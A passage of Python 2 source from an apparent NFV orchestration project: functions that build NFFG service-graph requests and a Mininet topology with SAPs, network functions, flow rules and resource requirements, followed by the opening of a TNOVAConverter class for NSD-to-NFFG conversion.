test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(dpi.add_port(2), bridge.add_port(1), id=13)
test.add_sglink(bridge.add_port(2), comp.add_port(1), id=14)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=15)
test.add_sglink(decomp.ports[1], sap1.ports[1], id=16)
test.add_sglink(sap2.add_port(1), webserver1.ports[0], id=21)
test.add_sglink(webserver1.ports[0], sap2.ports[1], id=22,
flowclass='dl_dst=00:00:00:00:00:02')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13, 14, 15, 16))
# test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
# sg_path=(21, 22, 14, 23))
return test
def generate_etsi_req4b2b ():
test = NFFG(id="ETSI-2sap-web-dpi-bridge+-comp-decomp-onlysap1",
name="ETSI-2sap-web-dpi-bridge+-comp-decomp-onlysap1")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
comp = test.add_nf(id="comp", name="COMPRESSOR",
func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1,
storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
bridge = test.add_nf(id="dockernf", name="dockernf", func_type="bridge",
cpu=1, mem=1,
storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(dpi.add_port(2), bridge.add_port(1), id=13)
test.add_sglink(bridge.add_port(2), comp.add_port(1), id=14)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=15)
test.add_sglink(decomp.ports[1], sap1.ports[1], id=16)
test.add_sglink(sap2.add_port(1), webserver1.ports[0], id=21)
test.add_sglink(webserver1.ports[0], sap2.ports[1], id=22,
flowclass='dl_dst=00:00:00:00:00:02')
test.add_sglink(bridge.add_port(3), sap2.ports[1], id=23)
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13, 14, 15, 16))
# test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
# sg_path=(21, 22, 14, 23))
return test
def generate_etsi_req4b2b_robot1 ():
test = NFFG(id="ETSI-2sap-web-dpi-bridge+-comp-decomp-onlysap1+robot1",
name="ETSI-2sap-web-dpi-bridge+-comp-decomp-onlysap1+robot1")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
comp = test.add_nf(id="comp", name="COMPRESSOR",
func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1,
storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
bridge = test.add_nf(id="dockernf", name="dockernf", func_type="bridge",
cpu=1, mem=1,
storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(dpi.add_port(2), bridge.add_port(1), id=13)
test.add_sglink(bridge.add_port(2), comp.add_port(1), id=14)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=15)
test.add_sglink(decomp.ports[1], sap1.ports[1], id=16)
test.add_sglink(sap2.add_port(1), webserver1.ports[0], id=21)
test.add_sglink(webserver1.ports[0], sap2.ports[1], id=22,
flowclass='dl_dst=00:00:00:00:00:02')
test.add_sglink(bridge.add_port(3), sap2.ports[1], id=23)
sap54 = test.add_sap(name="SAP54", id="SAP54")
balancer1 = test.add_nf(id="balance_server1", name="balance_server1",
func_type="balance_server", cpu=1, mem=1,
storage=0)
balancer2 = test.add_nf(id="balance_server2", name="balance_server2",
func_type="balance_server", cpu=1, mem=1,
storage=0)
splitter1 = test.add_nf(id="splitter", name="splitter", func_type="splitter",
cpu=1, mem=1, storage=0)
test.add_sglink(sap54.add_port(1), splitter1.add_port(1), id=31,
flowclass='dl_src=bc:ee:7b:e6:8c:07')
test.add_sglink(splitter1.add_port(2), balancer1.add_port(1), id=32)
test.add_sglink(splitter1.add_port(3), balancer2.add_port(1), id=33)
test.add_sglink(balancer1.ports[1], sap54.ports[1], id=34)
test.add_sglink(balancer2.ports[1], sap54.ports[1], id=35)
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13, 14, 15, 16))
# test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
# sg_path=(21, 22, 14, 23))
return test
# def generate_etsi_req4a ():
# test = NFFG(id="ETSI-1sap-web-dpi-bridge-comp-decomp",
# name="ETSI-1sap-web-dpi-bridge-comp-decomp")
# sap1 = test.add_sap(name="SAP1", id="sap1")
# comp = test.add_nf(id="comp", name="COMPRESSOR",
# func_type="headerCompressor",
# cpu=1, mem=1, storage=0)
# decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
# func_type="headerDecompressor", cpu=1, mem=1,
# storage=0)
# webserver1 = test.add_nf(id="webserver1", name="webserver1",
# func_type="webserver", cpu=1, mem=1, storage=0)
# dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
# storage=0)
# bridge = test.add_nf(id="dockernf", name="dockernf", func_type="bridge",
# cpu=1, mem=1,
# storage=0)
# test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
# test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
# flowclass='dl_dst=00:00:00:00:00:01')
# test.add_sglink(dpi.add_port(2), bridge.add_port(1), id=13)
# test.add_sglink(bridge.add_port(2), comp.add_port(1), id=14)
# test.add_sglink(comp.ports[1], decomp.add_port(1), id=15)
# test.add_sglink(decomp.ports[1], sap1.ports[1], id=16)
# test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
# sg_path=(11, 12, 13, 14, 15, 16))
# return test
# def generate_etsi_req4b ():
# test = NFFG(id="ETSI-2sap-web-dpi-bridge-comp-decomp",
# name="ETSI-2sap-web-dpi-bridge-comp-decomp")
# sap1 = test.add_sap(name="SAP1", id="sap1")
# sap2 = test.add_sap(name="SAP2", id="sap2")
# comp = test.add_nf(id="comp", name="COMPRESSOR",
# func_type="headerCompressor",
# cpu=1, mem=1, storage=0)
# decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
# func_type="headerDecompressor", cpu=1, mem=1,
# storage=0)
# webserver1 = test.add_nf(id="webserver1", name="webserver1",
# func_type="webserver", cpu=1, mem=1, storage=0)
# dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
# storage=0)
# bridge = test.add_nf(id="dockernf", name="dockernf", func_type="bridge",
# cpu=1, mem=1,
# storage=0)
# test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
# test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
# flowclass='dl_dst=00:00:00:00:00:01')
# test.add_sglink(dpi.add_port(2), bridge.add_port(1), id=13)
# test.add_sglink(bridge.add_port(2), comp.add_port(1), id=14)
# test.add_sglink(comp.ports[1], decomp.add_port(1), id=15)
# test.add_sglink(decomp.ports[1], sap1.ports[1], id=16)
# test.add_sglink(sap2.add_port(1), webserver1.ports[0], id=21)
# test.add_sglink(webserver1.ports[0], bridge.add_port(3), id=22,
# flowclass='dl_dst=00:00:00:00:00:02')
# test.add_sglink(bridge.add_port(4), sap2.ports[1], id=23)
# test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
# sg_path=(11, 12, 13, 14, 15, 16))
# test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
# sg_path=(21, 22, 23))
# return test
def generate_etsi_req4a_robot1 ():
test = NFFG(id="ETSI-1sap-web-dpi-bridge-comp-decomp-rob1",
name="ETSI-1sap-web-dpi-bridge-comp-decomp-rob1")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap54 = test.add_sap(name="SAP54", id="SAP54")
comp = test.add_nf(id="comp", name="COMPRESSOR",
func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1,
storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
bridge = test.add_nf(id="dockernf", name="dockernf", func_type="bridge",
cpu=1, mem=1,
storage=0)
balancer1 = test.add_nf(id="balance_server1", name="balance_server1",
func_type="balance_server", cpu=3, mem=1,
storage=0)
balancer2 = test.add_nf(id="balance_server2", name="balance_server2",
func_type="balance_server", cpu=3, mem=1,
storage=0)
splitter1 = test.add_nf(id="splitter", name="splitter", func_type="splitter",
cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(dpi.add_port(2), bridge.add_port(1), id=13)
test.add_sglink(bridge.add_port(2), comp.add_port(1), id=14)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=15)
test.add_sglink(decomp.ports[1], sap1.ports[1], id=16)
test.add_sglink(sap54.add_port(1), splitter1.add_port(1), id=21,
flowclass='dl_src=bc:ee:7b:e6:8c:07')
test.add_sglink(splitter1.add_port(2), balancer1.add_port(1), id=22)
test.add_sglink(splitter1.add_port(3), balancer2.add_port(1), id=23)
test.add_sglink(balancer1.ports[1], sap54.ports[1], id=24)
test.add_sglink(balancer2.ports[1], sap54.ports[1], id=25)
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13, 14, 15, 16))
test.add_req(sap54.ports[1], sap54.ports[1], bandwidth=1, delay=50,
sg_path=(21, 22, 24))
return test
def generate_etsi_req4a_robot12 ():
test = NFFG(id="ETSI-1sap-web-dpi-bridge-comp-decomp-rob12",
name="ETSI-1sap-web-dpi-bridge-comp-decomp-rob12")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap54 = test.add_sap(name="SAP54", id="SAP54")
comp = test.add_nf(id="comp", name="COMPRESSOR",
func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1,
storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
bridge = test.add_nf(id="dockernf", name="dockernf", func_type="bridge",
cpu=1, mem=1,
storage=0)
balancer1 = test.add_nf(id="balance_server1", name="balance_server1",
func_type="balance_server", cpu=3, mem=1,
storage=0)
balancer2 = test.add_nf(id="balance_server2", name="balance_server2",
func_type="balance_server", cpu=3, mem=1,
storage=0)
splitter1 = test.add_nf(id="splitter", name="splitter", func_type="splitter",
cpu=1, mem=1, storage=0)
balancer3 = test.add_nf(id="balance_server3", name="balance_server3",
func_type="balance_server", cpu=1, mem=1,
storage=0)
balancer4 = test.add_nf(id="balance_server4", name="balance_server4",
func_type="balance_server", cpu=1, mem=1,
storage=0)
splitter2 = test.add_nf(id="splitter2", name="splitter2",
func_type="splitter",
cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(dpi.add_port(2), bridge.add_port(1), id=13)
test.add_sglink(bridge.add_port(2), comp.add_port(1), id=14)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=15)
test.add_sglink(decomp.ports[1], sap1.ports[1], id=16)
test.add_sglink(sap54.add_port(1), splitter1.add_port(1), id=21,
flowclass='dl_src=bc:ee:7b:e6:8c:07')
test.add_sglink(splitter1.add_port(2), balancer1.add_port(1), id=22)
test.add_sglink(splitter1.add_port(3), balancer2.add_port(1), id=23)
test.add_sglink(balancer1.ports[1], sap54.ports[1], id=24)
test.add_sglink(balancer2.ports[1], sap54.ports[1], id=25)
test.add_sglink(sap54.ports[1], splitter2.add_port(1), id=31,
flowclass='dl_src=9c:5c:8e:af:2e:e0')
test.add_sglink(splitter2.add_port(2), balancer3.add_port(1), id=32)
test.add_sglink(splitter2.add_port(3), balancer4.add_port(1), id=33)
test.add_sglink(balancer3.ports[1], sap54.ports[1], id=34)
test.add_sglink(balancer4.ports[1], sap54.ports[1], id=35)
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13, 14, 15, 16))
test.add_req(sap54.ports[1], sap54.ports[1], bandwidth=1, delay=50,
sg_path=(21, 22, 24))
return test
def generate_etsi_req_robot1 ():
test = NFFG(id="SG-robot1", name="SG-robot1")
sap54 = test.add_sap(name="SAP54", id="SAP54")
balancer1 = test.add_nf(id="balance_server1", name="balance_server1",
func_type="balance_server", cpu=3, mem=1,
storage=0)
balancer2 = test.add_nf(id="balance_server2", name="balance_server2",
func_type="balance_server", cpu=3, mem=1,
storage=0)
splitter1 = test.add_nf(id="splitter", name="splitter", func_type="splitter",
cpu=1, mem=1, storage=0)
test.add_sglink(sap54.add_port(1), splitter1.add_port(1), id=11,
flowclass='dl_src=bc:ee:7b:e6:8c:07')
test.add_sglink(splitter1.add_port(2), balancer1.add_port(1), id=12)
test.add_sglink(splitter1.add_port(3), balancer2.add_port(1), id=13)
test.add_sglink(balancer1.ports[1], sap54.ports[1], id=14)
test.add_sglink(balancer2.ports[1], sap54.ports[1], id=15)
test.add_req(sap54.ports[1], sap54.ports[1], bandwidth=1, delay=50,
sg_path=(11, 12, 14))
return test
def generate_etsi_req_robot1_simple ():
test = NFFG(id="SG-robot1-simple", name="SG-robot1-simple")
sap54 = test.add_sap(name="SAP54", id="SAP54")
balancer1 = test.add_nf(id="balance_server1", name="balance_server1",
func_type="balance_server", cpu=1, mem=1,
storage=0)
# balancer2 = test.add_nf(id="balance_server2", name="balance_server2",
# func_type="balance_server", cpu=3, mem=1,
# storage=0)
splitter1 = test.add_nf(id="splitter", name="splitter", func_type="splitter",
cpu=1, mem=1, storage=0)
test.add_sglink(sap54.add_port(1), splitter1.add_port(1), id=11,
flowclass='dl_src=bc:ee:7b:e6:8c:07')
test.add_sglink(splitter1.add_port(2), balancer1.add_port(1), id=12)
# test.add_sglink(splitter1.add_port(3), balancer2.add_port(1), id=13)
test.add_sglink(balancer1.ports[1], sap54.ports[1], id=14)
# test.add_sglink(balancer2.ports[1], sap54.ports[1], id=15)
test.add_req(sap54.ports[1], sap54.ports[1], bandwidth=1, delay=50,
sg_path=(11, 12))
return test
def generate_etsi_req_robot2 ():
test = NFFG(id="SG-robot2", name="SG-robot2")
sap54 = test.add_sap(name="SAP54", id="SAP54")
balancer3 = test.add_nf(id="balance_server3", name="balance_server3",
func_type="balance_server", cpu=1, mem=1,
storage=0)
balancer4 = test.add_nf(id="balance_server4", name="balance_server4",
func_type="balance_server", cpu=1, mem=1,
storage=0)
splitter2 = test.add_nf(id="splitter2", name="splitter2",
func_type="splitter",
cpu=1, mem=1, storage=0)
test.add_sglink(sap54.add_port(1), splitter2.add_port(1), id=21,
flowclass='dl_src=9c:5c:8e:af:2e:e0')
test.add_sglink(splitter2.add_port(2), balancer3.add_port(1), id=22)
test.add_sglink(splitter2.add_port(3), balancer4.add_port(1), id=23)
test.add_sglink(balancer3.ports[1], sap54.ports[1], id=24)
test.add_sglink(balancer4.ports[1], sap54.ports[1], id=25)
test.add_req(sap54.ports[1], sap54.ports[1], bandwidth=1, delay=50,
sg_path=(21, 22, 24))
return test
def generate_etsi_req_robot12 ():
test = NFFG(id="SG-robot12", name="SG-robot12")
sap54 = test.add_sap(name="SAP54", id="SAP54")
balancer1 = test.add_nf(id="balance_server1", name="balance_server1",
func_type="balance_server", cpu=1, mem=1,
storage=0)
balancer2 = test.add_nf(id="balance_server2", name="balance_server2",
func_type="balance_server", cpu=1, mem=1,
storage=0)
splitter1 = test.add_nf(id="splitter1", name="splitter1",
func_type="splitter",
cpu=1, mem=1, storage=0)
balancer3 = test.add_nf(id="balance_server3", name="balance_server3",
func_type="balance_server", cpu=1, mem=1,
storage=0)
balancer4 = test.add_nf(id="balance_server4", name="balance_server4",
func_type="balance_server", cpu=1, mem=1,
storage=0)
splitter2 = test.add_nf(id="splitter2", name="splitter2",
func_type="splitter",
cpu=1, mem=1, storage=0)
test.add_sglink(sap54.add_port(1), splitter1.add_port(1), id=11,
flowclass='dl_src=bc:ee:7b:e6:8c:07')
test.add_sglink(splitter1.add_port(2), balancer1.add_port(1), id=12)
test.add_sglink(splitter1.add_port(3), balancer2.add_port(1), id=13)
test.add_sglink(balancer1.ports[1], sap54.ports[1], id=14)
test.add_sglink(balancer2.ports[1], sap54.ports[1], id=15)
test.add_sglink(sap54.ports[1], splitter2.add_port(1), id=21,
flowclass='dl_src=9c:5c:8e:af:2e:e0')
test.add_sglink(splitter2.add_port(2), balancer3.add_port(1), id=22)
test.add_sglink(splitter2.add_port(3), balancer4.add_port(1), id=23)
test.add_sglink(balancer3.ports[1], sap54.ports[1], id=24)
test.add_sglink(balancer4.ports[1], sap54.ports[1], id=25)
test.add_req(sap54.ports[1], sap54.ports[1], bandwidth=1, delay=50,
sg_path=(11, 12, 14))
return test
def generate_mn_topo_etsi ():
# Create NFFG
nffg = NFFG(id="INTERNAL", name="Internal-Mininet-Topology-ETSI")
# Add environments
ee11 = nffg.add_infra(id="EE11", name="ee-infra-11", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
ee12 = nffg.add_infra(id="EE12", name="ee-infra-12", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=2, mem=2, storage=2,
delay=0.9, bandwidth=5000)
ee21 = nffg.add_infra(id="EE21", name="ee-infra-21", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
ee22 = nffg.add_infra(id="EE22", name="ee-infra-22", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=2, mem=2, storage=2,
delay=0.9, bandwidth=5000)
# Add supported types
ee11.add_supported_type(
('headerDecompressor', 'simpleForwarder'))
ee12.add_supported_type(
('headerDecompressor', 'simpleForwarder'))
ee21.add_supported_type(
('headerCompressor', 'simpleForwarder'))
ee22.add_supported_type(
('headerCompressor', 'simpleForwarder'))
# Add OVS switches
sw1 = nffg.add_infra(id="SW1", name="switch-1", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
sw2 = nffg.add_infra(id="SW2", name="switch-2", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
gw = nffg.add_infra(id="GW", name="gateway", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.1,
bandwidth=10000)
# Add SAPs
sap1 = nffg.add_sap(id="SAP1", name="SAP1")
sap2 = nffg.add_sap(id="SAP2", name="SAP2")
sap14 = nffg.add_sap(id="SAP14", name="SAP14")
sap14.domain = "eth0"
# Add links
link_res = {'delay': 1.5, 'bandwidth': 10}
nffg.add_link(sw1.add_port(1), sap1.add_port(1), id="mn-link-sw1-sap1",
**link_res)
nffg.add_link(sw1.add_port(2), ee11.add_port(1), id="mn-link-sw1-ee11",
**link_res)
nffg.add_link(sw1.add_port(3), ee12.add_port(1), id="mn-link-sw1-ee12",
**link_res)
nffg.add_link(sw2.add_port(1), sap2.add_port(1), id="mn-link-sw2-sap2",
**link_res)
nffg.add_link(sw2.add_port(2), ee21.add_port(1), id="mn-link-sw2-ee21",
**link_res)
nffg.add_link(sw2.add_port(3), ee22.add_port(1), id="mn-link-sw2-ee22",
**link_res)
nffg.add_link(sw1.add_port(4), sw2.add_port(4), id="mn-link-sw1-sw2",
**link_res)
nffg.add_link(sw2.add_port(5), gw.add_port(1), id="mn-link-sw2-gw",
**link_res)
nffg.add_link(gw.add_port(2), sap14.add_port(1), id="mn-link-gw-sap14",
**link_res)
# nffg.duplicate_static_links()
return nffg
def generate_sssa_req ():
nffg = NFFG(id="SSSAreq1", name="SSSA connectivity request SAP1<->2")
sap1 = nffg.add_sap(id="SAP1", name="SAP1")
sap2 = nffg.add_sap(id="SAP2", name="SAP2")
nffg.add_sglink(src_port=sap1.add_port("port-SAP1"),
dst_port=sap2.add_port("port-SAP2"))
nffg.add_sglink(src_port=sap2.ports["port-SAP2"],
dst_port=sap1.ports["port-SAP1"])
return nffg
def generate_sssa_req2 ():
nffg = NFFG(id="SSSAreq1", name="SSSA connectivity request SAP1<->2")
sap1 = nffg.add_sap(id="SAP1", name="SAP1")
sap2 = nffg.add_sap(id="SAP2", name="SAP2")
nffg.add_sglink(src_port=sap1.add_port("port-SAP1"),
dst_port=sap2.add_port("port-SAP2"),
id="sg1")
nffg.add_sglink(src_port=sap2.ports["port-SAP2"],
dst_port=sap1.ports["port-SAP1"],
id="sg2")
nffg.add_req(src_port=sap1.ports["port-SAP1"],
dst_port=sap2.ports["port-SAP2"],
sg_path=["sg1"],
delay=1.0,
bandwidth=1000)
nffg.add_req(src_port=sap2.ports["port-SAP2"],
dst_port=sap1.ports["port-SAP1"],
sg_path=["sg2"],
delay=1.0,
bandwidth=1000)
return nffg
def generate_ietf_req ():
nffg = NFFG(id="SG-etsi-req", name="SG-etsi-req")
sap84 = nffg.add_sap(id="SAP84", name="SAP84")
sap85 = nffg.add_sap(id="SAP85", name="SAP85")
l2fwd = nffg.add_nf(id="L2fwdVhost", name="L2fwdVhost",
func_type="L2fwdVhost", cpu=2, mem=4, storage=0)
l2fwd.add_metadata(name="bw_req", value=0)
l2fwd.add_metadata(name="delay_req", value=100)
l2fwd2 = nffg.add_nf(id="L2fwdVhost2", name="L2fwdVhost2",
func_type="L2fwdVhost2", cpu=2, mem=4, storage=0)
l2fwd2.add_metadata(name="bw_req", value=0)
l2fwd2.add_metadata(name="delay_req", value=100)
nfpa = nffg.add_nf(id="NfpaVhost", name="NfpaVhost", func_type="NfpaVhost",
cpu=2, mem=4, storage=0)
nfpa.add_metadata(name="bw_req", value=0)
nfpa.add_metadata(name="delay_req", value=100)
nfpa2 = nffg.add_nf(id="NfpaVhost2", name="NfpaVhost2",
func_type="NfpaVhost2",
cpu=2, mem=4, storage=0)
nfpa2.add_metadata(name="bw_req", value=0)
nfpa2.add_metadata(name="delay_req", value=100)
# l2fwd
nffg.add_sglink(src_port=sap84.add_port(2), dst_port=l2fwd.add_port(1),
id=11, flowclass="eth_type=2048,ip_proto=17,udp_dst=8900")
nffg.add_sglink(src_port=l2fwd.ports[1], dst_port=sap84.ports[2],
id=12)
# l2fwd2
nffg.add_sglink(src_port=sap84.ports[2], dst_port=l2fwd2.add_port(2),
id=17, flowclass="eth_type=2048,ip_proto=17,udp_dst=8901")
nffg.add_sglink(src_port=l2fwd2.ports[2], dst_port=sap84.ports[2],
id=18)
# nfpa
nffg.add_sglink(src_port=sap85.add_port(2), dst_port=nfpa.add_port(1),
id=13, flowclass="eth_type=2048,ip_proto=17,udp_dst=8900")
nffg.add_sglink(src_port=nfpa.ports[1], dst_port=sap85.ports[2],
id=14)
# nfpa2
nffg.add_sglink(src_port=sap85.ports[2], dst_port=nfpa2.add_port(2),
id=15, flowclass="eth_type=2048,ip_proto=17,udp_dst=8901")
nffg.add_sglink(src_port=nfpa2.ports[2], dst_port=sap85.ports[2],
id=16)
return nffg
def generate_verification_req ():
nffg = NFFG(id="verification-2sap-web-fw-dpi-nat",
name="verification-2sap-web-fw-dpi-nat")
sap1 = nffg.add_sap(id="SAP1", name="SAP1")
sap1.add_port(1)
sap2 = nffg.add_sap(id="SAP2", name="SAP2")
sap2.add_port(1)
sap3 = nffg.add_sap(id="SAP3", name="SAP3")
sap3.add_port(1)
fw = nffg.add_nf(id="fw", name="FIREWALL", func_type="firewall",
cpu=1, mem=1, storage=0)
fw.add_port(1)
fw.add_port(2)
fw.add_metadata(name="nf_static_config",
value="ovs-ofctl add-flow fw in_port=2,actions=output:1;"
"ovs-ofctl add-flow fw in_port=1,dl_type=0x0800,"
"nw_proto=6,tp_src=80,actions=output:2")
ws1 = nffg.add_nf(id="webserver1", name="webserver1", func_type="webserver",
cpu=1, mem=1, storage=0)
ws1.add_port(1)
ws1.add_metadata(name="nf_static_config",
value="filter packets with 'sex'")
dpi = nffg.add_nf(id="dpi", name="DPI", func_type="dpi",
cpu=1, mem=1, storage=0)
dpi.add_port(1)
dpi.add_port(2)
dpi.add_metadata(name="nf_static_config", value="10.0.0.0/24 <-> 172.16.58.3/32")
nat = nffg.add_nf(id="nat", name="NAT", func_type="nat",
cpu=1, mem=1, storage=0)
nat.add_port(1)
nat.add_port(2)
nffg.add_sglink(id=11, src_port=sap1.ports[1], dst_port=nat.ports[1])
nffg.add_sglink(id=12, src_port=nat.ports[2], dst_port=fw.ports[2])
nffg.add_sglink(id=13, src_port=fw.ports[1], dst_port=ws1.ports[1])
nffg.add_sglink(id=14, src_port=ws1.ports[1], dst_port=fw.ports[1],
flowclass="dl_type=0x0800,nw_dst=172.16.58.3")
nffg.add_sglink(id=15, src_port=fw.ports[2], dst_port=nat.ports[2])
nffg.add_sglink(id=16, src_port=nat.ports[1], dst_port=sap1.ports[1],
flowclass="dl_type=0x0800,nw_dst=10.0.0.1")
nffg.add_sglink(id=21, src_port=sap2.ports[1], dst_port=nat.ports[1])
nffg.add_sglink(id=26, src_port=nat.ports[1], dst_port=dpi.ports[1],
flowclass="dl_type=0x0800,nw_dst=10.0.0.2")
nffg.add_sglink(id=27, src_port=dpi.ports[2], dst_port=sap2.ports[1])
nffg.add_sglink(id=31, src_port=sap3.ports[1], dst_port=ws1.ports[1])
nffg.add_sglink(id=32, src_port=ws1.ports[1], dst_port=sap3.ports[1],
flowclass="dl_type=0x0800,nw_dst=192.168.3.11")
nffg.add_req(src_port=sap1.ports[1],
dst_port=sap1.ports[1],
sg_path=[11, 12, 13, 14, 15, 16],
delay=100,
bandwidth=1)
nffg.add_req(src_port=sap2.ports[1],
dst_port=sap2.ports[1],
sg_path=[21, 12, 13, 14, 15, 26, 27],
delay=100,
bandwidth=1)
nffg.add_req(src_port=sap3.ports[1],
dst_port=sap3.ports[1],
sg_path=[31, 32],
delay=100,
bandwidth=1)
return nffg
if __name__ == "__main__":
# test_parse_load()
# test_NFFG()
# nffg = generate_mn_topo()
# nffg = generate_mn_test_req()
# nffg = generate_dynamic_fallback_nffg()
# nffg = generate_static_fallback_topo()
# nffg = generate_one_bisbis()
# nffg = gen()
# nffg = generate_sdn_topo2()
# nffg = generate_sdn_req()
# nffg = generate_os_req()
# nffg = generate_os_mn_req()
# nffg = generate_dov()
# nffg = generate_global_req()
# nffg = generate_ewsdn_req2()
# nffg = generate_simple_test_topo()
# nffg = generate_simple_test_req()
# nffg = generate_mn_topo2()
# nffg = generate_mn_test_req2()
# nffg = generate_mn_req_hackathon()
# nffg = generate_hwloc2nffg_test_req()
# nffg = generate_5gex_req1()
# nffg = generate_etsi_req1b()
# nffg = generate_etsi_req4b2b_robot1()
# nffg = generate_etsi_req_robot1_simple()
# nffg = generate_mn_topo_etsi()
# nffg = generate_req_verification()
# nffg = generate_sssa_req()
# nffg = generate_ietf_req()
nffg = generate_verification_req()
# pprint(nffg.network.__dict__)
# nffg.merge_duplicated_links()
# pprint(nffg.network.__dict__)
print nffg.dump()
# print generate_merged_mapped()
``` |
{
"source": "5GExchange/tnova_connector",
"score": 2
} |
#### File: tnova_connector/conversion/converter.py
```python
import argparse
import json
import logging
import os
import pprint
import re
import sys
from nffg_lib.nffg import NFFG
from nsd_wrapper import NSWrapper
from util.colored_logger import ColoredLogger
from vnf_catalogue import VNFCatalogue, MissingVNFDException
class TNOVAConverter(object):
"""
Converter class for NSD --> NFFG conversion.
"""
LOGGER_NAME = "TNOVAConverter"
# DEFAULT_SAP_PORT_ID = None # None = generated an UUID by defaults
DEFAULT_SAP_PORT_ID = 1
DEFAULT_PLACEMENT_SUBNET = "Automatic"
ANTIAFFINITY_CONSTRAINT = "antiaffinity"
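# Illustrative usage sketch (added; not part of the original module). Only
# methods defined in this class are shown, and "nsd.json" is a placeholder
# path -- the actual conversion entry point may differ:
#   converter = TNOVAConverter(logger=log, vnf_catalogue=catalogue)
#   converter.initialize()
#   ns = converter.parse_nsd_from_file("nsd.json")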
def __init__ (self, logger=None, vnf_catalogue=None):
"""
Constructor.
:param logger: optional logger
"""
if logger is not None:
self.log = logger.getChild(self.LOGGER_NAME)
# self.log.name = self.LOGGER_NAME
else:
self.log = logging.getLogger(self.__class__.__name__)
if vnf_catalogue is not None:
self.__catalogue = vnf_catalogue
else:
self.__catalogue = VNFCatalogue(logger=logger)
self.vlan_register = {}
def __str__ (self):
return "%s()" % self.__class__.__name__
def initialize (self):
